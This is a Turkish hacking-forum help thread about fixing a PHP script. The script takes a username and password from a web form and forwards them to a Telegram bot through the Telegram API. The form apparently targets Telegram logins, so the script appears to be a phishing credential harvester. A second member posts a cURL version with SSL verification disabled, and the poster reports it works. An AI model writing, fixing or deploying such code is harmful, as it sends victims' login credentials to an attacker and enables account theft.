Çözüldü Php Script sadece localhostta calışıyor

CyberSC

Üye
17 Mar 2018
55
0
Merhaba arkadaslar Php İle telegram apiden kanala mesaj atma scriptini Yaptım Fakat Sadece localhostta çalşıyıyor. Hostinge attım Ve Onay.php de beyaz sayfa çıkıyor ama mesajı göndermiyor. localhostta ise beyazsayfada kalıyor ama mesajı gönderiyor. Sorun nedir

index.php :
Kod:
<form action="onayla.php method="POST">
<p>
<input type="text" name="tgad">
</p>
<p>
<input type="text" name="tgsif">
</p>
<p>
<button type="submit">Onayla</button>
</p>
</form>

Onayla.php :
Kod:
<?php
$teg = $_POST['tgad'];
$teg2 = $_POST['tgsif'];

file_get_contents('https://api.telegram.org/botTOKEN/sendMessage?chat_id=CHATID&text='."Kullanıcı Adı: ".$teg. " Şifre: ".$teg2);

?>

Biraz araştırdım curl ile yapın diyolar ama curl isini anlamadim Yeniyim biraz bu işlerde Sorun nedir

Moderatör tarafında düzenlendi:

C 0 D E R

Katılımcı Üye
21 May 2020
429
48
SIFIR6
Bknz;
$token = "asdf123";
$api="https://api.telegram.org/bot".$token;
$mesajID=1234567; //Mesaj ID
$parametre=['chat_id'=>$mesajID,'text'=>'Mesaj',];
$ch = curl_init($api. '/sendMessage');
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ($parametre));
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$result = curl_exec($ch);
curl_close($ch);

Deneyip haber verirsen olası hatalarda yardımcı olabilirim.

C 0 D E R

Katılımcı Üye
21 May 2020
429
48
SIFIR6
hicbir değişiklik yok aynı Boş sayfada kaliyor ve mesaj göndermiyor

Eksik herhangi bir şey yapmadığına eminsin değil mi? Webhook'a ihtiyacın olduğunu düşünmüyorum ancak webhook ayarlarını yapmayı deneyebilirsin böylece telegram kanalına yazılan mesajları alıp herhangi bir işlem yapmadan direk chat id üzerinden istediğin mesajı gönderebilirsin.

CyberSC

Üye
17 Mar 2018
55
0
Eksik herhangi bir şey yapmadığına eminsin değil mi? Webhook'a ihtiyacın olduğunu düşünmüyorum ancak webhook ayarlarını yapmayı deneyebilirsin böylece telegram kanalına yazılan mesajları alıp herhangi bir işlem yapmadan direk chat id üzerinden istediğin mesajı gönderebilirsin.

:gülenyüz SSL Almamışım Çalıştı Teşşekür ederim

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.